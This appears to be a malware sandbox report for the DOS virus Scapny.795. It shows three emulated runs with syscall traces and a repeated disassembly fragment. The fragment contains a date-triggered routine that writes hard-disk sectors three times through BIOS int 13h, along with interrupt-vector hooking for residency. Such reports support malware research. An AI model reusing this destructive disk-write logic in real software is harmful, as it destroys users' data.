Sample viewer

vx.netlux.org/Virus.DOS.Scapny.795

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:48:41.659567708Z 72 PC: 12c42 | Allocate memory
2018-12-17T22:48:41.662996156Z 42 PC: 12c68 | Get date 0x12c68: cmp dx, 0x315
0x12c6c: jne 0x12c80
0x12c6e: mov cx, 3
0x12c71: push cx
0x12c72: mov ax, 0x301
0x12c75: mov dx, 0x80
0x12c78: mov cx, 1
0x12c7b: int 0x13
0x12c7d: pop cx
0x12c7e: loop 0x12c71
0x12c80: xor ax, ax
0x12c82: mov ds, ax
0x12c84: mov bx, 0x184
0x12c87: cmp word ptr [bx], 0x13
0x12c8a: je 0x12cd2
0x12c8c: mov word ptr [bx], 0x13
0x12c90: mov bx, 0x80
0x12c93: sub word ptr es:[2], bx
0x12c98: mov ax, es
0x12c9a: dec ax
2018-12-17T22:48:41.665313935Z 53 PC: 12cc3 | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T22:48:41.666296488Z 37 PC: 12cd2 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T22:48:41.668192838Z 9 PC: 12b33 | Display string (Could not find end pointer)
2018-12-17T22:48:41.679482266Z 76 PC: 12b37 | Terminate with return code (Return code = '36')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":9634,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:23:21.843384291Z 72 PC: 12c42 | Allocate memory
2018-12-25T12:23:21.845823775Z 42 PC: 12c68 | Get date 0x12c68: cmp dx, 0x315
0x12c6c: jne 0x12c80
0x12c6e: mov cx, 3
0x12c71: push cx
0x12c72: mov ax, 0x301
0x12c75: mov dx, 0x80
0x12c78: mov cx, 1
0x12c7b: int 0x13
0x12c7d: pop cx
0x12c7e: loop 0x12c71
0x12c80: xor ax, ax
0x12c82: mov ds, ax
0x12c84: mov bx, 0x184
0x12c87: cmp word ptr [bx], 0x13
0x12c8a: je 0x12cd2
0x12c8c: mov word ptr [bx], 0x13
0x12c90: mov bx, 0x80
0x12c93: sub word ptr es:[2], bx
0x12c98: mov ax, es
0x12c9a: dec ax
2018-12-25T12:23:21.848754823Z 53 PC: 12cc3 | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:23:21.850253574Z 37 PC: 12cd2 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:23:21.851829852Z 9 PC: 12b33 | Display string (Could not find end pointer)
2018-12-25T12:23:21.865464097Z 76 PC: 12b37 | Terminate with return code (Return code = '36')

{"DateBased":true,"Day":21,"Month":3,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":9634,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:23:22.304454719Z 72 PC: 12c42 | Allocate memory
2018-12-25T12:23:22.308105932Z 42 PC: 12c68 | Get date 0x12c68: cmp dx, 0x315
0x12c6c: jne 0x12c80
0x12c6e: mov cx, 3
0x12c71: push cx
0x12c72: mov ax, 0x301
0x12c75: mov dx, 0x80
0x12c78: mov cx, 1
0x12c7b: int 0x13
0x12c7d: pop cx
0x12c7e: loop 0x12c71
0x12c80: xor ax, ax
0x12c82: mov ds, ax
0x12c84: mov bx, 0x184
0x12c87: cmp word ptr [bx], 0x13
0x12c8a: je 0x12cd2
0x12c8c: mov word ptr [bx], 0x13
0x12c90: mov bx, 0x80
0x12c93: sub word ptr es:[2], bx
0x12c98: mov ax, es
0x12c9a: dec ax
2018-12-25T12:23:22.640996619Z 53 PC: 12cc3 | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:23:22.642770344Z 37 PC: 12cd2 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:23:22.644623661Z 9 PC: 12b33 | Display string (Could not find end pointer)
2018-12-25T12:23:22.658013133Z 76 PC: 12b37 | Terminate with return code (Return code = '36')